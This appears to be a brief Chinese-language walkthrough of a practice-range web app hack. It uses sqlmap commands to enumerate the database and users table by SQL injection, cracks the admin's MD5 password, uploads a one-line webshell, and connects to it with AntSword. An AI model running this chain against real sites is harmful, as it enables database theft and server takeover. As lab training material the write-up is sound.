1.登陆靶场网站首页
2.注册登录
3.单机search,有很多书
4.搜索一本书抓包发放到重放器
5.数据改为1*,复制数据包到1.txt,发到kali里面
6.sqlmap查看当前数据库
sqlmap -r '/home/kali/Desktop/1.txt' --current-db --batch
7.查看表名
sqlmap -r '/home/kali/Desktop/1.txt' -D webapphacking --tables --batch
8.查看users表中列
sqlmap -r '/home/kali/Desktop/1.txt' -D webapphacking -T users --columns --batch
9.查看表中数据信息
10.MD5解密superadmin 密码
11.账号superadmin 密码Uncrackable登录
12.上传一句话木马
上面显示上传到uploads文件夹里
13.访问uploads文件夹
14.蚁剑连接
